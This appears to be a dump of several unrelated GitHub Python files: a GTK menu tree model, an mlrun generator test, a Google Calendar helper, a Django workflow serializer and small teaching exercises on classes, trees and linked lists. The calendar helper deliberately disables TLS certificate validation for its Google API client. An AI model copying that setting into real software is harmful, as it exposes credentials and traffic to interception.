        gtk.TreeStore.__init__(self, *self.COLUMN_TYPES)
        if not menu_file:
            menu_file = 'uxm-applications.menu'
        self.menu_editor = xdg.MenuEditor.MenuEditor(menu_file)
        root = xdg_adapter.XdgDirectoryAdapter(self.menu_editor.menu)
        self.__append_directory(root, None, False, menu_file)
        self.entries_list_iter = None

    def to_liststore(self):
        """Flatten the tree into a ListStore, appending each row's path string."""
        types = self.COLUMN_TYPES + (str,)
        store = gtk.ListStore(*types)
        columns = range(self.get_n_columns())

        def add(model, path, it):
            path = self.path_to_string(path)
            row = self.get_row(it, columns) + (path,)
            store.append(row)
        self.foreach(add)
        return store

    def path_to_string(self, path):
        """Serialize a tree path tuple as 'a:b:c' (pass-through for strings)."""
        if isinstance(path, str):
            return path
        return ':'.join((str(p) for p in path))

    def string_to_path(self, path):
        """Inverse of path_to_string.

        NOTE(review): the components stay strings here; confirm callers do not
        expect integer path elements.
        """
        if isinstance(path, tuple):
            return path
        return tuple(path.split(':'))

    def get_row(self, iter, columns=None):
        """Return the tuple of values at *iter* (all columns by default)."""
        if not columns:
            columns = range(self.get_n_columns())
        return self.get(iter, *columns)

    def update(self, data):
        """Apply edited fields from *data* to the menu on disk and the model."""
        t = data['type']
        # update menu
        if adapters.TYPE_ENTRY == t:
            self.menu_editor.editMenuEntry(
                data['object'].adaptee,
                name=data['name'],
                #genericname = data['name'],
                comment=data['comment'],
                command=data['command'],
                icon=data['icon'],
                terminal=data['terminal']
            )
        elif adapters.TYPE_DIRECTORY == t:
            self.menu_editor.editMenu(
                data['object'].adaptee,
                name=data['name'],
                #genericname = data['name'],
                comment=data['comment'],
                icon=data['icon'],
            )
        # update treemodel
        it = self.get_iter_from_string(data['_path'])
        obj = self.get_value(it, self.COLUMN_OBJECT)
        icon = gio.ThemedIcon(str(obj.get_icon()), True)
        self.set(
            it,
            self.COLUMN_ID, obj.get_filename(),
            self.COLUMN_NAME, obj.get_display_name(),
            self.COLUMN_ICON, icon
        )

    def create(self, data):
        """Create a new menu entry or submenu under data['_parent']."""
        t = data['type']
        parent_path = data['_parent']
        parent_iter = self.get_iter_from_string(parent_path)
        parent_entry = self.get_value(parent_iter, self.COLUMN_OBJECT)
        if adapters.TYPE_ENTRY == t:
            entry = self.menu_editor.createMenuEntry(
                parent_entry and parent_entry.adaptee or None,
                data['name'],
                #genericname = data['name'],
                comment=data['comment'],
                command=data['command'],
                icon=data['icon'],
                terminal=data['terminal']
            )
        elif adapters.TYPE_DIRECTORY == t:
            entry = self.menu_editor.createMenu(
                parent_entry and parent_entry.adaptee or None,
                data['name'],
                #genericname = data['name'],
                comment=data['comment'],
                icon=data['icon'],
            )
        obj = xdg_adapter.factory(entry)
        icon = gio.ThemedIcon(str(obj.get_icon()), True)
        #FIXME: this doesn't update the view ???
        self.append(
            parent_iter,
            (
                t == adapters.TYPE_DIRECTORY,
                obj.get_type(), obj.get_display_name(),
                obj.get_display_name(), icon,
                None, True, True,
                obj
            )
        )

    def __append_directory(self, directory, parent_iter, system, menu_file):
        """Recursively merge *directory* into the model under *parent_iter*.

        Existing rows (matched by id) are reused; the *system* flag selects
        which visibility column gets set.
        """
        if not directory:
            return
        # Look for an existing row for this directory among the children.
        iter = self.iter_children(parent_iter)
        while iter is not None:
            if self.get_value(iter, self.COLUMN_ID) == directory.get_name():
                break
            iter = self.iter_next(iter)
        if iter is None:
            icon = gio.ThemedIcon(str(directory.get_icon()), True)
            type = directory.get_type()
            row = (
                type == adapters.TYPE_ENTRY,
                type, directory.get_name(),
                directory.get_display_name(), icon,
                menu_file, False, False,
                directory
            )
            iter = self.append(parent_iter, row)
        if system:
            self.set_value(iter, self.COLUMN_SYSTEM_VISIBLE, True)
        else:
            self.set_value(iter, self.COLUMN_USER_VISIBLE, True)
        for entry in directory:
            current_type = entry.get_type()
            if current_type == adapters.TYPE_DIRECTORY:
                self.__append_directory(entry, iter, system, None)
            if current_type != adapters.TYPE_ENTRY:
                continue
            # Reuse an existing child row with the same filename, if any.
            child_iter = self.iter_children(iter)
            while child_iter is not None:
                if self.get_value(child_iter, self.COLUMN_TYPE) == adapters.TYPE_ENTRY and (
                    self.get_value(child_iter, self.COLUMN_ID) == entry.get_filename()
                ):
                    break
                child_iter = self.iter_next(child_iter)
            if child_iter is None:
                icon = gio.ThemedIcon(str(entry.get_icon()), True)
                type = entry.get_type()
                row = (
                    type == adapters.TYPE_ENTRY,
                    type, entry.get_filename(),
                    entry.get_display_name(), icon,
                    None, False, False,
                    entry
                )
                child_iter = self.append(iter, row)
                if system:
                    self.set_value(child_iter, self.COLUMN_SYSTEM_VISIBLE, entry.is_visible(), )
                else:
                    self.set_value(child_iter, self.COLUMN_USER_VISIBLE, entry.is_visible(), )
| ju1ius/uxdgmenu | usr/lib/uxdgmenu/uxm/dialogs/editor/treemodel.py | treemodel.py | py | 6,603 | python | en | code | 17 | github-code | 36 |
22355326575 | import pathlib
from contextlib import nullcontext as does_not_raise
import pytest
import mlrun.runtimes.generators
@pytest.mark.parametrize(
    "strategy,param_file,expected_generator_class,expected_error,expected_iterations",
    [
        (
            "list",
            "hyperparams.csv",
            mlrun.runtimes.generators.ListGenerator,
            does_not_raise(),
            2,
        ),
        (
            "list",
            "hyperparams.json",
            mlrun.runtimes.generators.ListGenerator,
            does_not_raise(),
            2,
        ),
        (
            "grid",
            "hyperparams.json",
            mlrun.runtimes.generators.GridGenerator,
            does_not_raise(),
            4,
        ),
        (
            "random",
            "hyperparams.json",
            mlrun.runtimes.generators.RandomGenerator,
            does_not_raise(),
            # default max iterations
            mlrun.runtimes.generators.default_max_iterations,
        ),
        # no strategy, default to list
        (
            "",
            "hyperparams.csv",
            mlrun.runtimes.generators.ListGenerator,
            does_not_raise(),
            2,
        ),
        # no strategy, default to grid
        (
            "",
            "hyperparams.json",
            mlrun.runtimes.generators.GridGenerator,
            does_not_raise(),
            4,
        ),
        # invalid request
        ("grid", "hyperparams.csv", None, pytest.raises(ValueError), 0),
    ],
)
def test_get_generator(
    rundb_mock,
    strategy,
    param_file,
    expected_generator_class,
    expected_error,
    expected_iterations,
):
    """Verify that get_generator picks the right generator class and yields
    the expected number of iterations for each strategy/param-file combo."""
    run_spec = mlrun.model.RunSpec(inputs={"input1": 1})
    run_spec.strategy = strategy
    # Hyperparameter files live next to this test under ./assets.
    run_spec.param_file = str(
        pathlib.Path(__file__).absolute().parent / "assets" / param_file
    )
    execution = mlrun.run.MLClientCtx.from_dict(
        mlrun.run.RunObject(spec=run_spec).to_dict(),
        rundb_mock,
        autocommit=False,
        is_api=False,
        store_run=False,
    )
    # expected_error is either does_not_raise() or pytest.raises(...).
    with expected_error:
        generator = mlrun.runtimes.generators.get_generator(run_spec, execution, None)
        assert isinstance(
            generator, expected_generator_class
        ), f"unexpected generator type {type(generator)}"
        iterations = sum(
            1 for _ in generator.generate(mlrun.run.RunObject(spec=run_spec))
        )
        assert (
            iterations == expected_iterations
        ), f"unexpected number of iterations {iterations}"
        if strategy == "list":
            assert generator.df.keys().to_list() == ["p1", "p2"]
        elif strategy in ["grid", "random"]:
            assert sorted(list(generator.hyperparams.keys())) == ["p1", "p2"]
| mlrun/mlrun | tests/runtimes/test_generators.py | test_generators.py | py | 2,780 | python | en | code | 1,129 | github-code | 36 |
13490200231 | class Personel():
    """Simple employee record (Turkish field names: ad=first name,
    soyad=surname, yas=age, cinsiyet=sex, maas=salary)."""
    def __init__(self,ad,soyad,yas,cinsiyet,maas):
        self.ad=ad
        self.soyad=soyad
        self.yas=yas
        self.cinsiyet=cinsiyet
        self.maas=maas
    def bilgileriYazdir(self):
        """Print the employee's details (Turkish output)."""
        print("""
        {} {} Bilgileri şunlardır :
        Yaşı : {}
        Cinsiyet : {}
        Maaş : {}
        """.format(self.ad,self.soyad,self.yas,self.cinsiyet,self.maas))
    def __str__(self):
        # Same text as bilgileriYazdir(), returned instead of printed.
        return """
        {} {} Bilgileri şunlardır :
        Yaşı : {}
        Cinsiyet : {}
        Maaş : {}
        """.format(self.ad,self.soyad,self.yas,self.cinsiyet,self.maas)
class Yonetici(Personel):
    """Manager: inherits all Personel fields and can raise salaries."""
    def __init__(self,ad,soyad,yas,cinsiyet,maas):
        super().__init__(ad,soyad,yas,cinsiyet,maas)
    def maasArtir(self,pObject, arttirmaMiktari=1000):
        """Raise *pObject*'s salary in place (default increment 1000)."""
        pObject.maas += arttirmaMiktari
# Demo: build an employee and a manager, have the manager raise the
# employee's salary by the default 1000, then print the updated record.
personel=Personel("mert","sis","22","erkek",10000)
#personel.bilgileriYazdir()
print(personel)
yonetici=Yonetici("tolgayan","cayliyak","25","erkek",20000)
#print(yonetici)
yonetici.maasArtir(personel)
personel.bilgileriYazdir()
| AydinTokuslu/PythonTutorial | Ders_Konulari/Ders-18_Kalitim.py | Ders-18_Kalitim.py | py | 1,084 | python | tr | code | 0 | github-code | 36 |
74051194023 | #from apiclient.discovery import build
from googleapiclient.discovery import build
from oauth2client.service_account import ServiceAccountCredentials
import httplib2
#from oauth2client import client, file, tools
import datetime
import pytz
import re
import configparser
# """
# timezone/DST correction:
# """
# def getTimeFromUTC() ):
# #get the difference between localtime and now. round to half hours
# #N.B. bad b/c daylight saving!
# secdiff=(datetime.datetime.utcnow() - datetime.datetime.now()).total_seconds()
# hourdiff=round(secdiff/60,2)
# return( datetime.timedelta(seconds=hourdiff*60) )
#DELTAFROMUTC = getTimeFromUTC()
def to_utc(dt, tzstr="America/New_York"):
    """Shift a naive local datetime into naive UTC for the given zone."""
    offset = pytz.timezone(tzstr).utcoffset(dt)
    return dt - offset
# later when printing, will get the same time as we put in
# utc=pytz.timezone('UTC')
# return( tz.localize(dt).astimezone( utc ) )
# def to_tz(dt,tzstr="America/New_York"):
# tz=pytz.timezone(tzstr)
# utc=pytz.timezone('UTC')
# return( utc.localize(dt).astimezone( tz ) )
def get_service(api_name, api_version, scope, key_file_location,
                service_account_email):
    """Authenticate with a p12 service-account key and build a Google API client."""
    credentials = ServiceAccountCredentials.from_p12_keyfile(
        service_account_email, key_file_location, scopes=scope)

    # UPMC MItM's our SSL connection: disable_ssl_certificate_validation=True
    # todo: add as config switch
    http = credentials.authorize(httplib2.Http(
        disable_ssl_certificate_validation=True))

    # Build the service object.
    service = build(api_name, api_version, http=http)

    return service
def g2time(dtstr):
    """
    google time string to datetime
    -> google gives back time in localtime

    Only the first 19 characters ('YYYY-MM-DDTHH:MM:SS') are parsed; the
    trailing UTC offset is deliberately ignored. (A previous [0:18] slice
    truncated the seconds to a single digit.)
    """
    return datetime.datetime.strptime(dtstr[0:19], '%Y-%m-%dT%H:%M:%S')
def calInfo(e):
    """
    Extract calendar info from a Google API event dict.

    The summary is additionally parsed into study, age, sex, subject
    initials, RA and score fields when it matches the expected pattern.
    """
    start_str = e['start']['dateTime']
    start_dt = g2time(start_str)
    end_dt = g2time(e['end']['dateTime'])
    info = {
        'start': start_str,
        'starttime': start_dt,
        'dur_hr': (end_dt - start_dt).seconds / 60 / 60,
        'creator': e['creator'].get('displayName'),
        'note': e.get('description'),
        'calid': e.get('id'),
        'summary': e.get('summary'),
        'htmlLink': e.get('htmlLink')
    }
    pattern = re.compile(
        r'(?P<study>[a-z/]+)[ -]*(?P<age>[0-9.]+) *yo(?P<sex>m|f) *\(?(?P<subjinit>[A-Z]{2,3})\)? *(?P<ra>[A-Z]{2,3})[ -]*(?P<score>[0-9.]+)',
        re.I)
    match = re.search(pattern, e['summary'])
    if match:
        info.update(match.groupdict())
    return info
def time2g(dt, tzstr="America/New_York"):
    """Format a naive local datetime as a Google API UTC timestamp ('...Z')."""
    # Forward the zone: previously tzstr was accepted but ignored, so callers
    # like LNCDcal.upcoming(passing self.tzstr) silently got the default zone.
    return to_utc(dt, tzstr).isoformat() + 'Z'
def time2gdict(dt, tzstr="America/New_York"):
    """Build the Google Calendar start/end dict for a naive local datetime."""
    # Forward the zone so the timestamp and the timeZone label agree.
    return {'dateTime': time2g(dt, tzstr), 'timeZone': tzstr}
"""
a class containing a connection to our google calendar
"""
class LNCDcal():
    """Connection to the lab's Google calendar, configured from an ini file."""
    # authenticate
    # ini: cal.ini
    # [Calendar]
    # email = 'yyy@xxx.iam.gserviceaccount.com'
    # p12 = '/path/to/creds.p12'
    # calID = 'email@gmail.com'
    # tz = 'America/New_York'
    def __init__(self, ini):
        """Read credentials/settings from *ini* and open the calendar service."""
        # Define the auth scopes to request.
        # -- read in from ini
        config = configparser.RawConfigParser()
        config.read(ini)
        service_account_email = config.get('Calendar', 'email')
        key_file_location = config.get('Calendar', 'p12')
        self.calendarId = config.get('Calendar', 'calID')
        self.backCalID = config.get('Calendar', 'backCalID', fallback=None)
        self.tzstr = config.get('Calendar', 'tz')
        scope = ['https://www.googleapis.com/auth/calendar']
        self.cal = get_service('calendar', 'v3', scope, key_file_location,
                               service_account_email)
        # might need to be updated after events are add
        self.events = self.cal.events()

    def find_in_range(self, dtmin, dtmax):
        """List events between dtmin and dtmax (datetimes or Google strings)."""
        if(isinstance(dtmin, datetime.datetime)):
            dtmin = time2g(dtmin)
        if(isinstance(dtmax, datetime.datetime)):
            dtmax = time2g(dtmax)
        events = self.events.list(
            calendarId=self.calendarId,
            singleEvents=True,
            timeMin=dtmin,
            timeMax=dtmax).execute()
        # use only events with datetime starts (remove full day events)
        items = [calInfo(i) for i in events['items']
                 if i['start'].get('dateTime')]
        # check time
        #dt.isoformat()[0:16] == items[0]['start']['dateTime'][0:16]
        return(items)

    def find(self, dt):
        """Events within +/- 10 minutes of *dt*."""
        delta = 10
        dtmin = dt - datetime.timedelta(minutes=delta)
        dtmax = dt + datetime.timedelta(minutes=delta)
        items = self.find_in_range(dtmin, dtmax)
        return(items)

    def upcoming(self, daydelta=5):
        """Events from now through *daydelta* days ahead."""
        dt = datetime.datetime.now()
        dtmin = time2g(dt, self.tzstr)
        dtmax = time2g(dt + datetime.timedelta(days=daydelta), self.tzstr)
        items = self.find_in_range(dtmin, dtmax)
        return(items)

    def insert_event(self, startdt, dur_h, summary, desc):
        """Create an event of *dur_h* hours starting at *startdt*."""
        endtime = startdt + datetime.timedelta(hours=dur_h)
        event = {
            'summary': summary,
            'description': desc,
            'start': time2gdict(startdt, self.tzstr),
            'end': time2gdict(endtime, self.tzstr)
        }
        eventres = self.cal.events().insert(
            calendarId=self.calendarId, body=event).execute()
        return(eventres)

    def delete_event(self, eventId):
        """Delete the event with the given id from the primary calendar."""
        res = self.cal.events().delete(
            calendarId=self.calendarId,
            eventId=eventId).execute()
        return(res)

    def get_event(self, eventId):
        """ get an event: useful for testing successful delete"""
        res = self.cal.events().get(
            calendarId=self.calendarId,
            eventId=eventId).execute()
        return(res)

    def move_event(self, eventId):
        """move event to different calendar we have a 'backCalID' in config"""
        if self.backCalID is None:
            raise Exception("No backCalID in config, but trying to move")
        print("moving %s to %s" % (eventId, self.backCalID))
        res = self.cal.events().move(
            calendarId=self.calendarId,
            eventId=eventId,
            destination=self.backCalID).execute()
        return(res)
| LabNeuroCogDevel/LNCDcal.py | LNCDcal/LNCDcal.py | LNCDcal.py | py | 6,453 | python | en | code | 0 | github-code | 36 |
11936779128 | #import ipdb
import logging
from typing import Optional, cast
from rest_framework import serializers
from rest_framework.exceptions import APIException, ErrorDetail, ValidationError
from rest_flex_fields.serializers import FlexFieldsSerializerMixin
from ..exception.unprocessable_entity import UnprocessableEntity
from ..models import *
from .name_and_uuid_serializer import NameAndUuidSerializer
from .embedded_id_validating_serializer_mixin import (
EmbeddedIdValidatingSerializerMixin
)
from .group_setting_serializer_mixin import GroupSettingSerializerMixin
from .workflow_task_instance_serializer import WorkflowTaskInstanceSerializer
from .workflow_transition_serializer import WorkflowTransitionSerializer
from .workflow_execution_serializer import WorkflowExecutionSummarySerializer
logger = logging.getLogger(__name__)

# Field lists shared between the summary and full Workflow serializers so
# the two stay in sync.
COMMON_FIELDS = [
    'url', 'uuid', 'name', 'description', 'dashboard_url',
    'schedule', 'max_concurrency',
    'max_age_seconds', 'default_max_retries',
    'max_postponed_failure_count', 'max_postponed_missing_execution_count',
    'max_postponed_timeout_count',
    'min_missing_execution_delay_seconds',
    'postponed_failure_before_success_seconds',
    'postponed_missing_execution_before_start_seconds',
    'postponed_timeout_before_success_seconds',
    'scheduled_instance_count',
    'should_clear_failure_alerts_on_success',
    'should_clear_timeout_alerts_on_success',
    'latest_workflow_execution',
    'created_by_user', 'created_by_group',
    'run_environment',
    'enabled',
    'created_at', 'updated_at'
]

# Subset of COMMON_FIELDS that clients may read but never write.
COMMON_READ_ONLY_FIELDS = [
    'url', 'uuid', 'dashboard_url',
    'latest_workflow_execution',
    'created_by_user', 'created_by_group',
    'created_at', 'updated_at'
]
class WorkflowSummarySerializer(GroupSettingSerializerMixin,
                                serializers.HyperlinkedModelSerializer):
    """
    Selected properties of Workflows, without the nested task instances
    and transitions (see WorkflowSerializer for the full representation).
    """

    class Meta:
        model = Workflow
        fields = COMMON_FIELDS
        read_only_fields = COMMON_READ_ONLY_FIELDS

    # Most recent execution, rendered as a nested summary; never writable.
    latest_workflow_execution = WorkflowExecutionSummarySerializer(
        required=False, allow_null=True, read_only=True)

    # Detail link resolved by UUID rather than primary key.
    url = serializers.HyperlinkedIdentityField(
        view_name='workflows-detail',
        lookup_field='uuid'
    )
class WorkflowSerializer(
        EmbeddedIdValidatingSerializerMixin,
        FlexFieldsSerializerMixin,
        WorkflowSummarySerializer):
    """
    Workflows are Tasks arranged in a directed graph. Configured Tasks
    are held by WorkflowTaskInstances, and WorkflowTransitions connect
    WorkflowTaskInstances together.
    """

    # Prefix clients put on placeholder UUIDs of not-yet-created nested
    # objects; transitions may reference these before the WTIs exist.
    NEW_UUID_PREFIX = 'NEW_'

    class Meta:
        model = Workflow
        fields = COMMON_FIELDS + [
            'alert_methods', 'workflow_task_instances',
            'workflow_transitions',
        ]
        read_only_fields = COMMON_READ_ONLY_FIELDS

    # Nested objects are declared read-only for DRF; writes are handled
    # manually in create_or_update() below.
    workflow_task_instances = WorkflowTaskInstanceSerializer(
        many=True, read_only=True)
    workflow_transitions = WorkflowTransitionSerializer(many=True, read_only=True)
    alert_methods = NameAndUuidSerializer(include_name=True,
            view_name='alert_methods-detail', many=True, required=False)

    def to_internal_value(self, data):
        """Validate the top-level payload and pass nested dicts through raw.

        NOTE(review): mutates the caller-supplied ``data`` dict in place
        (description/schedule defaults, latest_workflow_execution pop).
        """
        logger.info(f"wfs: to_internal value, data = {data}")
        workflow: Optional[Workflow] = cast(Workflow, self.instance) if self.instance else None
        data['description'] = data.get('description') or ''
        data['schedule'] = data.get('schedule') or ''
        data.pop('latest_workflow_execution', None)
        validated = super().to_internal_value(data)
        # The nested fields above are read-only, so super() skips them;
        # carry the raw dicts along for create_or_update() to process.
        validated['workflow_task_instances'] = data.get('workflow_task_instances')
        validated['workflow_transitions'] = data.get('workflow_transitions')
        logger.debug(f"wfs: to_internal value, validated = {validated}")
        # Fall back to the existing Workflow's Run Environment on update.
        run_environment = validated.get('run_environment',
                workflow.run_environment if workflow else None)
        self.set_validated_alert_methods(data=data, validated=validated,
                run_environment=run_environment,
                allow_any_run_environment=(run_environment is None))
        return validated

    def create(self, validated_data):
        # Both create and update funnel into create_or_update().
        return self.create_or_update(None, validated_data)

    def update(self, instance, validated_data):
        return self.create_or_update(instance, validated_data)

    def create_or_update(self, instance, validated_data):
        """Save the Workflow plus its nested task instances and transitions.

        Steps:
          1. Save the Workflow's own attributes (create or update).
          2. Reconcile WorkflowTaskInstances: delete ones missing from the
             payload, then create/update each payload entry (matching by
             UUID, or by name when no UUID is given).
          3. Reconcile WorkflowTransitions, rewriting 'NEW_' placeholder
             UUIDs to the UUIDs of the freshly created WTIs, and deleting
             transitions not present in the payload.
        """
        defaults = validated_data
        alert_methods = defaults.pop('alert_methods', None)
        wtis = defaults.pop('workflow_task_instances', None)
        wts = defaults.pop('workflow_transitions', None)

        if instance:
            super().update(instance, defaults)
            workflow = instance
        else:
            # uuid is server-assigned; ignore any client-sent value.
            defaults.pop('uuid', None)
            workflow = Workflow(**defaults)
            workflow.save()

        if alert_methods is not None:
            workflow.alert_methods.set(alert_methods)

        # If the payload omitted task instances entirely, leave the nested
        # graph untouched.
        if wtis is None:
            return workflow

        # Index the existing WTIs by UUID and by name for matching below.
        old_wtis_by_uuid = {}
        old_wtis_by_name = {}
        for wti in workflow.workflow_task_instances.select_related(
                'task__run_environment').all():
            old_wtis_by_uuid[str(wti.uuid)] = wti
            old_wtis_by_name[wti.name] = wti

        # Index the incoming WTI dicts; each must carry a uuid or a name.
        new_wtis_by_uuid = {}
        new_wtis_by_name = {}
        for wti_dict in wtis:
            wti_uuid = wti_dict.get('uuid')
            if wti_uuid:
                new_wtis_by_uuid[wti_uuid] = wti_dict
            else:
                wti_name = wti_dict.get('name')
                if wti_name is None:
                    raise ValidationError({
                        'workflow_task_instances': [
                            ErrorDetail('Workflow Task Instance missing uuid and name', code='invalid')
                        ]
                    })
                new_wtis_by_name[wti_name] = wti_dict

        # Delete existing WTIs absent (by both uuid and name) from the payload.
        for wti_uuid, wti in old_wtis_by_uuid.items():
            if (wti_uuid not in new_wtis_by_uuid) and (wti.name not in new_wtis_by_name):
                wti.delete()

        logger.info(f"old_wtis_by_uuid = {old_wtis_by_uuid}")

        old_wts_by_uuid = {}
        for wt in workflow.workflow_transitions().all():
            old_wts_by_uuid[str(wt.uuid)] = wt

        # Create or update each incoming WTI.
        for wti_dict in wtis:
            wti_uuid = wti_dict.pop('uuid', None)
            wti_name = wti_dict.get('name')
            existing_wti = None
            if wti_uuid:
                # 'NEW_' UUIDs denote objects to create, not to look up.
                if not wti_uuid.startswith(self.NEW_UUID_PREFIX):
                    existing_wti = old_wtis_by_uuid.get(wti_uuid)
                    if existing_wti is None:
                        raise ValidationError({
                            'workflow_task_instances': [
                                ErrorDetail(f'Workflow Task Instance with UUID {wti_uuid} is not part of Workflow',
                                        code='invalid')
                            ]
                        })
                    logger.info(f"Found existing WTI with UUID {wti_uuid}")
            elif wti_name:
                existing_wti = old_wtis_by_name.get(wti_name)
                if existing_wti is None:
                    raise ValidationError({
                        'workflow_task_instances': [
                            ErrorDetail(f"Workflow Task Instance with name '{wti_name}' is not part of Workflow",
                                    code='invalid')
                        ]
                    })

            ser = WorkflowTaskInstanceSerializer(instance=existing_wti, data=wti_dict,
                    partial=True, context=self.context, workflow=workflow,
                    for_embedded_deserialization=True)

            # Re-wrap nested serializer errors under the
            # 'workflow_task_instances' key for the API response.
            try:
                if not ser.is_valid():
                    msg = f"Error saving Workflow Task Instance with UUID {wti_uuid or '[Empty]'}, name '{wti_name or '[Empty]'}'"
                    logger.error(msg)
                    # ser.errors results in ValueError: Too many values to unpack
                    #errors = [error_detail.string for error_detail in ser.errors]
                    raise serializers.ValidationError({
                        'workflow_task_instances': [msg]
                    })
            except serializers.ValidationError as ve:
                logger.exception('workflow serializer validation error')
                raise serializers.ValidationError({
                    'workflow_task_instances': [str(ve)]
                }) from ve
            except UnprocessableEntity as ue:
                raise UnprocessableEntity({
                    'workflow_task_instances': [str(ue)]
                }) from ue
            except APIException as api_ex:
                raise APIException({
                    'workflow_task_instances': [str(api_ex)]
                }) from api_ex

            saved_wti = ser.save(workflow=workflow)

            # Remember the real UUID so transitions referencing the
            # 'NEW_' placeholder can be rewritten below.
            if wti_uuid and wti_uuid.startswith(self.NEW_UUID_PREFIX):
                new_wtis_by_uuid[wti_uuid] = saved_wti

        if wts is None:
            # FIXME: handle case when transitions are not resent
            logger.info('Workflow Transitions not set')
        else:
            for wt_dict in wts:
                wt_uuid = wt_dict.pop('uuid', None)
                existing_wt = None
                if wt_uuid and not wt_uuid.startswith(self.NEW_UUID_PREFIX):
                    # pop() so whatever remains afterwards can be deleted.
                    existing_wt = old_wts_by_uuid.pop(wt_uuid, None)
                    if existing_wt is None:
                        # NOTE(review): error is keyed under
                        # 'workflow_task_instances' although it concerns a
                        # transition — likely should be
                        # 'workflow_transitions'; confirm before changing
                        # since API clients may depend on the current key.
                        raise ValidationError({
                            'workflow_task_instances': [
                                ErrorDetail(f'Workflow Transition with UUID {wt_uuid} is not part of Workflow',
                                        code='invalid')
                            ]
                        })

                # Rewrite 'NEW_' placeholder endpoint UUIDs to real ones.
                from_wti_dict = wt_dict.get('from_workflow_task_instance', None)
                if from_wti_dict:
                    wti_uuid = from_wti_dict['uuid']
                    if wti_uuid.startswith(self.NEW_UUID_PREFIX):
                        from_wti_dict['uuid'] = str(new_wtis_by_uuid[wti_uuid].uuid)

                to_wti_dict = wt_dict.get('to_workflow_task_instance', None)
                if to_wti_dict:
                    wti_uuid = to_wti_dict['uuid']
                    if wti_uuid.startswith(self.NEW_UUID_PREFIX):
                        to_wti_dict['uuid'] = str(new_wtis_by_uuid[wti_uuid].uuid)

                if existing_wt:
                    ser = WorkflowTransitionSerializer(existing_wt, data=wt_dict, context=self.context)
                else:
                    ser = WorkflowTransitionSerializer(data=wt_dict, context=self.context)

                ser.is_valid(raise_exception=True)
                ser.save()

            # Remove transitions that were not re-sent in the payload.
            WorkflowTransition.objects.filter(uuid__in=old_wts_by_uuid.keys()).delete()
        return workflow
| CloudReactor/task_manager | server/processes/serializers/workflow_serializer.py | workflow_serializer.py | py | 10,948 | python | en | code | 0 | github-code | 36 |
def pre_ordem(pont):
    """Pre-order (root, left, right) traversal printing each node's value."""
    if pont is None:
        return
    print(pont.valor)
    pre_ordem(pont.esq)
    pre_ordem(pont.dir)
def em_ordem(pont):
    """In-order (left, root, right) traversal printing each node's value."""
    if pont is None:
        return
    em_ordem(pont.esq)
    print(pont.valor)
    em_ordem(pont.dir)
def pos_ordem(pont):
    """Post-order (left, right, root) traversal printing each node's value."""
    if pont is None:
        return
    pos_ordem(pont.esq)
    pos_ordem(pont.dir)
    print(pont.valor)
# Quick manual test of the traversals
class No:
    """Binary-tree node holding a value and left/right child links.

    Generalized constructor: the original no-argument form ``No()`` still
    works, but value and children may now be supplied directly.
    """

    def __init__(self, valor=None, esq=None, dir=None):
        self.valor = valor  # stored value
        self.esq = esq      # left child (No or None)
        self.dir = dir      # right child (No or None)
# Build the following test tree by hand:
#         20
#        /  \
#      10    40
#      /    /  \
#     5    30   50
raiz = No()
raiz.valor = 20
elemento1 = No()
elemento1.valor = 10
raiz.esq = elemento1
elemento2 = No()
elemento2.valor = 5
elemento1.esq = elemento2
elemento3 = No()
elemento3.valor = 40
raiz.dir = elemento3
elemento4 = No()
elemento4.valor = 30
elemento3.esq = elemento4
elemento5 = No()
elemento5.valor = 50
elemento3.dir = elemento5
# Run the three traversals; expected output:
# pre-order:  20 10 5 40 30 50
# in-order:   5 10 20 30 40 50
# post-order: 5 10 30 50 40 20
pre_ordem(raiz)
em_ordem(raiz)
pos_ordem(raiz)
| GabrielReira/EDA-UFBA | 09.py | 09.py | py | 830 | python | pt | code | 0 | github-code | 36 |
41357846970 | "JIAHAO CHEN 89"
class SNode:
    """Node of a singly linked list: one element plus the next-node link."""

    def __init__(self, e, next=None):
        self.next = next
        self.elem = e
class MySList():
    """Singly linked list with head/tail references (SNode-based)."""

    def __init__(self):
        self._head = None
        self._tail = None

    def __str__(self):
        """Return the elements in Python-list format, e.g. [1, 2, 3]."""
        # Walk the chain, joining elements with ", ", then trim the
        # trailing separator before closing the bracket.
        nodeIt = self._head
        result = '['
        while nodeIt:
            result += str(nodeIt.elem) + ", "
            nodeIt = nodeIt.next
        if len(result) > 1:
            result = result[:-2]
        result += ']'
        return result

    def append(self, e):
        """Adds a new element, e, at the end of the list"""
        # create the new node
        newNode = SNode(e)
        # the last node must point to the new node
        # now, we must update the tail reference
        if self._head == None:
            self._head = newNode
        else:
            self._tail.next = newNode
        self._tail = newNode

    def isSorted(self):
        """Return True if the elements are in non-decreasing order."""
        if self._head == None:
            return True
        else:
            # Compare each adjacent pair; any inversion means unsorted.
            node1 = self._head
            node2 = node1.next
            while node2:
                if node1.elem > node2.elem:
                    return False
                node1 = node2
                node2 = node2.next
            return True

    def merge(self, other):
        """Merge two sorted lists into a new sorted, duplicate-free list.

        Steps:
          1. Verify each list is ordered (returns None if either is not),
             removing adjacent duplicates in place as a side effect.
          2. Splice the two node chains together in order, advancing both
             when elements are equal so duplicates across lists are dropped.

        Returns self/other when the counterpart is empty; returns None on
        unsorted input.

        NOTE(review): the merged list reuses the original nodes (self and
        other are consumed), and the result's _tail is never set — a
        subsequent append() on the merged list would fail. Confirm before
        relying on the result for further mutation.
        """
        yes1 = False
        yes2 = False
        if self._head != None:
            node1 = self._head
            # check if the list is ordered
            while node1.next:
                if node1.next.elem > node1.elem:
                    node1 = node1.next
                elif node1.next.elem == node1.elem: # if duplicate, remove them
                    node1.next = node1.next.next
                else:
                    return None # the list is not ordered
            yes1 = True
        if other._head != None:
            node2 = other._head
            # check if the second list is ordered
            while node2.next:
                if node2.next.elem > node2.elem:
                    node2 = node2.next
                elif node2.next.elem == node2.elem: # if duplicate, remove them
                    node2.next = node2.next.next
                else:
                    return None # the list is not ordered
            yes2 = True
        if yes1 and yes2:
            # merge both lists: inode tracks the tail of the merged chain
            sl = MySList()
            node1 = self._head
            node2 = other._head
            inode = None
            while node1 and node2:
                if node1.elem < node2.elem:
                    if sl._head == None:
                        sl._head = node1
                        inode = sl._head
                    else:
                        inode.next = node1
                        inode = inode.next
                    node1 = node1.next
                elif node1.elem > node2.elem:
                    if sl._head == None:
                        sl._head = node2
                        inode = sl._head
                    else:
                        inode.next = node2
                        inode = inode.next
                    node2 = node2.next
                elif node1.elem == node2.elem:
                    # equal heads: keep one node, advance both lists
                    if sl._head == None:
                        sl._head = node1
                        inode = sl._head
                    else:
                        inode.next = node1
                        inode = inode.next
                    node1 = node1.next
                    node2 = node2.next
